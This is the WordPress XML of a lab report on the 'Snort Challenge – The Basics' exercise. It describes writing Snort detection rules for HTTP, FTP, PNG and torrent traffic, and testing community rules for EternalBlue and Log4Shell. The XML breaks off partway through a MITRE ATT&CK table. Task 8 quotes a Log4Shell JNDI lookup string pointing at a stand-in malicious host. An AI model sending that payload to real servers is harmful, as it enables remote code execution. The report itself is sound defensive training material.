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2FB" w:rsidRPr="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="151C2B"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="F9F9FB"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE52FB">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="F9F9FB"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Snort Challenge - The Basics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full Incident Report – Snort Challenge: The Basics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Lab Name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort Challenge – The Basics</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Network Security &amp; Traffic Analysis – Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This lab involved developing and testing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Snort IDS rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to detect specific malicious activities across different network protocols (HTTP, FTP, PNG file transfers, and torrent metadata).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">We also worked with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>external Snort rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> targeting high-profile vulnerabilities (MS17-010 &amp; Log4j) to simulate real SOC use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key objective was to gain practical experience in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>rule creation, testing, and troubleshooting</w:t>
      </w:r>
      <w:r>
        <w:t>, which is a critical skill for SOC detection engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Investigation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Task 2 – Writing IDS Rules (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Created a Snort rule to detect HTTP requests containing a specific malicious string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>snort</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB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alert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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; any 80 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve">:"Suspicious HTTP Request"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>content:"malware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve">"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>nocase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>; sid:1000001; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verified detection by generating HTTP traffic with the keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Task 3 – Writing IDS Rules (FTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wrote a rule to flag login attempts over FTP protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>snort</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB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lastRenderedPageBreak/>
        <w:t>alert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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; any 21 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve">:"FTP Login Detected"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>content:"USER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve">"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>nocase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>; sid:1000002; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tested with simulated FTP login packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Task 4 – Writing IDS Rules (PNG)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Developed a rule to detect PNG file downloads over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Used PNG file signature (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>\x89PNG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Task 5 – Writing IDS Rules (Torrent Metafile)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Created a rule to detect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>.torrent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> metafiles by matching the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>announce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This simulates detection of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>peer-to-peer traffic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in corporate environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Task 6 – Troubleshooting Rule Syntax Errors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Used Snort syntax check mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB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snort</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T -c /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>/snort/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>snort.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Corrected misplaced semicolons and incorrect keywords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Task 7 – Using External Rules (MS17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Loaded public community rule to detect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verified alert trigger on sample PCAP containing exploit attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Task 8 – Using External Rules (Log4j)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deployed Snort rule to detect exploitation attempts against Log4Shell vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed detection via malicious HTTP header containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>://malicious.com/a}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB" w:rsidP="00DE52FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. MITRE ATT&amp;CK Mapping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3559"/>
        <w:gridCol w:w="3089"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE52FB" w:rsidTr="00DE52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E52FB" w:rsidRDefault="00DE52FB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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB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Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE52FB" w:rsidTr="00DE52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52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>T1071.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>Application Layer Protocol: Web Traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>Malicious HTTP request detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE52FB" w:rsidTr="00DE52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52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>PNG file and torrent detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE52FB" w:rsidTr="00DE52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52FB" w:rsidRDefault="00DE52FB">
            <w:r>
              <w:t>T1021.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE52FB" w:rsidRDefault="00DE52FB">
